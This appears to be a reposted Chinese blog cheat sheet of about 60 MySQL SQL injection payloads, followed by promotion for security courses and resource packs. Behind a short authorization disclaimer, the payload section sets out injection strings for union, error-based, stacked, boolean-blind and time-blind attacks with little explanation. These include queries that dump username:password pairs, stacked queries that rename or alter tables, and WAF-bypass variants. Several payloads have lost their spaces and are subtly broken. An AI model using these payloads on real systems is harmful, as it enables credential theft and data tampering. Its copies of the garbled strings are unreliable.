渗透测试手册:60个常用SQL注入Payload清单
SQL注入攻防全攻略:网络安全工程师必备技能(建议收藏学习)
本文全面介绍了SQL注入技术,包括联合查询、报错注入、堆叠查询、布尔盲注、时间盲注等多种攻击技术,以及编码绕过、注释符变种、空格绕过等防御规避方法。文章详细讲解了从探测数据库信息、枚举表结构到提取数据的完整流程,并提供了基础检测步骤和自动化检测要点。强调技术仅用于授权安全测试和教育研究,提醒读者遵守法律法规。
❝
💖 温馨提示:本文所有技术内容仅用于授权安全测试和教育研究。未经授权对任何系统进行测试属于违法行为,请严格遵守相关法律法规!
一、理解SQL注入的本质
1.1 什么是SQL注入?
SQL注入是一种通过操纵应用程序输入来干扰后端SQL查询的技术漏洞。攻击者利用此漏洞可以:
- 读取敏感数据库信息
- 修改或删除数据
- 执行数据库管理操作
1.2 为什么安全人员需要了解SQL注入?
- 漏洞评估:在授权测试中识别和验证漏洞
- 代码审计:帮助开发人员编写更安全的代码
- 防御建设:基于攻击技术设计更有效的防护方案
1.3 合法测试环境要求
- ✅ 自己拥有或获得明确授权的系统
- ✅ 隔离的测试环境
- ✅ 明确的学习和研究目的
想要学习更多的渗透测试知识?欢迎关注我们官方的B站,每天更新在线的学习视频,点击下方链接 B站官方账号
二、SQL注入技术分类
2.1 联合查询注入技术
2.1.1 探测字段数量
' ORDER BY 1-- ' ORDER BY 10--2.1.2 构造联合查询
' UNION SELECTNULL,NULL,NULL-- ' UNION SELECT 1,@@version,database()--2.1.3 获取数据库信息
' UNION SELECTNULL,database(),NULL,NULL-- ' UNION SELECT NULL,version(),NULL,NULL-- 'UNIONSELECTNULL,user(),NULL,NULL--2.1.4 枚举表结构
' UNION SELECTNULL,table_name,NULL,NULLFROM information_schema.tables WHERE table_schema=database()-- ' UNION SELECT NULL,group_concat(table_name),NULL,NULL FROM information_schema.tables WHERE table_schema=database()--2.1.5 提取列信息
' UNION SELECTNULL,column_name,NULL,NULLFROM information_schema.columns WHERE table_schema=database() AND table_name='users'-- ' UNION SELECT NULL,group_concat(column_name),NULL,NULL FROM information_schema.columns WHERE table_schema=database() AND table_name='users'--2.1.6 提取数据
' UNION SELECTNULL,concat(username,':',password),NULL,NULLFROMusers-- ' UNION SELECT NULL,group_concat(concat(username,0x3a,password)),NULL,NULL FROM users--2.2 报错注入
2.2.1 ExtractValue函数利用
' AND extractvalue(1,concat(0x7e,(SELECTdatabase())))-- ' AND extractvalue(1,concat(0x7e,(SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)))--2.2.2 UpdateXML函数利用
' AND updatexml(1,concat(0x7e,(SELECTdatabase()),0x7e),1)-- ' AND updatexml(1,concat(0x7e,(SELECT password FROM users LIMIT 0,1),0x7e),1)--2.2.3 数值溢出
' AND exp(~(SELECT * FROM (SELECTdatabase())a))-- ' AND (SELECT 1 FROM (SELECT count(*),concat(database(),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)--2.3 堆叠查询注入
2.3.1 数据库结构
'; SHOWdatabases-- '; SHOW tables-- '; SHOWcolumnsFROMusers--2.3.2 表操作
'; RENAMETABLEusersTO temp_users; RENAMETABLEadminTOusers-- '; ALTER TABLE users CHANGE password pass_hash VARCHAR(255)--2.3.3 Handler数据读取
'; HANDLERusersOPEN; HANDLERusersREADFIRST; HANDLERusersCLOSE--2.3.4 预处理语句绕过
'; SET @sql=0x73656c6563742031; PREPARE stmt FROM @sql; EXECUTE stmt-- '; PREPARE stmt FROM CONCAT('S','ELECT * FROMusers'); EXECUTE stmt--2.4 布尔盲注技术
2.4.1 探测数据库信息
' AND length(database())=5-- ' AND ascii(substring(database(),1,1))>100--2.4.2 枚举表结构
' AND (SELECTcount(table_name) FROM information_schema.tables WHERE table_schema=database())>0-- ' AND ascii(substring((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1),1,1))>100--2.4.3 列信息获取
' AND (SELECTcount(column_name) FROM information_schema.columns WHERE table_name='users')=3-- ' AND ascii(substring((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 0,1),1,1))>100--2.4.4 数据提取
' AND ascii(substring((SELECT username FROMusersLIMIT0,1),1,1))=97-- ' AND (SELECT count(*) FROM users WHERE username='admin')=1--2.5 时间盲注技术
2.5.1 基础时间延迟
' AND IF(1=1,SLEEP(5),0)-- ' AND IF(length(database())=5,SLEEP(3),0)--2.5.2 条件时间延迟
' AND IF(ascii(substring(database(),1,1))>100,BENCHMARK(1000000,MD5('test')),0)--2.5.3 复杂条件判断
' AND IF((SELECTcount(*) FROMusers)=10,SLEEP(3),0)-- ' AND IF(EXISTS(SELECT * FROM information_schema.tables WHERE table_schema=database() AND table_name='users'),SLEEP(3),0)--2.5.4 数据提取延迟
' AND IF(ascii(substring((SELECTpasswordFROMusersWHERE username='admin'),1,1))=97, SLEEP(3),0)--2.6 高级绕过技术
2.6.1 编码绕过
' AND 1=1-- ' UNION SELECT1,hex(database()),3,4--2.6.2 注释符变种
' OR 1=1/* ' OR 1=1;-- ' OR 1=1%232.6.3 空格绕过
'OR'1'='1 'UNION/**/SELECT/**/1,2,3--2.6.4 比较操作符绕过
' OR 1 LIKE 1-- ' OR true != false--2.7 防御规避技术
2.7.1 WAF绕过
' UNIunionON SELselectECT 1,2,3-- ' /*!50000UNION*/SELECT1,2,3--2.7.2 大小写混合
' uNiOn SeLeCt1,2,3-- ' UnIoN aLl SeLeCt 1,2,3--2.7.3 参数污染
?id=1'/*&id=*/UNION/*&id=*/SELECT1,2,3--2.8 实用检测流程
2.8.1 基础检测步骤
- 单引号检测:
' - 布尔检测:
' AND '1'='1/' AND '1'='2 - 联合查询检测:
' ORDER BY 10-- - 错误检测:
' AND 1=cast(@@version as int)--
2.8.2 自动化检测要点
-- 快速检测语句 ' OR 1=1-- ' UNION SELECTNULL,NULL-- ' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--三、🎯 文末福利
文章来自网上,侵权请联系博主
题外话
黑客/网络安全学习路线
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
网络安全学习资源分享:
下面给大家分享一份2025最新版的网络安全学习路线资料,帮助新人小白更系统、更快速的学习黑客技术!
一、2025最新网络安全学习路线
一个明确的学习路线可以帮助新人了解从哪里开始,按照什么顺序学习,以及需要掌握哪些知识点。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
读者福利 |CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)
我们把学习路线分成L1到L4四个阶段,一步步带你从入门到进阶,从理论到实战。
L1级别:网络安全的基础入门
L1阶段:我们会去了解计算机网络的基础知识,以及网络安全在行业的应用和分析;学习理解安全基础的核心原理,关键技术,以及PHP编程基础;通过证书考试,可以获得NISP/CISP。可就业安全运维工程师、等保测评工程师。
L2级别:网络安全的技术进阶
L2阶段我们会去学习渗透测试:包括情报收集、弱口令与口令爆破以及各大类型漏洞,还有漏洞挖掘和安全检查项目,可参加CISP-PTE证书考试。
L3级别:网络安全的高阶提升
L3阶段:我们会去学习反序列漏洞、RCE漏洞,也会学习到内网渗透实战、靶场实战和技术提取技术,系统学习Python编程和实战。参加CISP-PTE考试。
L4级别:网络安全的项目实战
L4阶段:我们会更加深入进行实战训练,包括代码审计、应急响应、红蓝对抗以及SRC的挖掘技术。并学习CTF夺旗赛的要点和刷题
整个网络安全学习路线L1主要是对计算机网络安全的理论基础的一个学习掌握;而L3 L4更多的是通过项目实战来掌握核心技术,针对以上网安的学习路线我们也整理了对应的学习视频教程,和配套的学习资料。
二、技术文档和经典PDF书籍
书籍和学习文档资料是学习网络安全过程中必不可少的,我自己整理技术文档,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,(书籍含电子版PDF)

三、网络安全视频教程
对于很多自学或者没有基础的同学来说,书籍这些纯文字类的学习教材会觉得比较晦涩难以理解,因此,我们提供了丰富的网安视频教程,以动态、形象的方式展示技术概念,帮助你更快、更轻松地掌握核心知识。
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
四、网络安全护网行动/CTF比赛
学以致用,当你的理论知识积累到一定程度,就需要通过项目实战,在实际操作中检验和巩固你所学到的知识,同时为你找工作和职业发展打下坚实的基础。

五、网络安全工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

面试不仅是技术的较量,更需要充分的准备。
在你已经掌握了技术之后,就需要开始准备面试,我们将提供精心整理的网安面试题库,涵盖当前面试中可能遇到的各种技术问题,让你在面试中游刃有余。
如果你是要找网安方面的工作,它们绝对能帮你大忙。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
参考解析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
**读者福利 |**CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)